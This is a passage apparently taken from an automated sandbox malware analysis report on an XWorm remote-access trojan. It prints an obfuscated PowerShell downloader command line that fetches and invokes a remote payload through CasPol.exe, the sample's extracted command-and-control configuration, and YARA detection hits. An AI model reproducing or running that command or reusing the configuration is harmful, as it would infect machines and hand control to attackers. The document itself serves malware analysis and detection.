'+'}'+'me' +'thod = { 0}type.Get Method({1} VA'+'I{1}' +');{0}'+' m'+'e'+'th '+'od.In'+ 'v'+'oke({ 0}nu'+'ll, [obje'+'c t['+']]'+' @({1}'+'0' +'/gJ1k'+' S'+'/d/'+' ee.e'+'tsa p//:sptth{ 1'+'}'+' , '+' {1}de' +'sat'+'iv ado{1'+'}' +' , {1'+' }desativa' +'d'+'o{1} , {1}'+'d e'+'sativa do{'+'1},{ 1}C'+'a'+' sPo'+'l{1} '+',{1'+'} {'+'1}))') -f [chAR]3 6,[chAR]39 ) |Iex" MD5: 04029E121A0CFA5991749937DD22A1D9) - CasPol.exe (PID: 7228 cmdline:
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| XWorm | Malware with a wide range of capabilities, ranging from RAT to ransomware. | No Attribution | | |
{"C2 url": ["135.224.23.113"], "Port": "5555", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_XWorm | Yara detected XWorm | Joe Security | |
| | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen | |
| | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| | JoeSecurity_XWorm | Yara detected XWorm | Joe Security | |
| | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen | |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_XWorm | Yara detected XWorm | Joe Security | |
| | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen | |
| | JoeSecurity_XWorm | Yara detected XWorm | Joe Security | |
| | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen | |
| | JoeSecurity_XWorm | Yara detected XWorm | Joe Security | |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |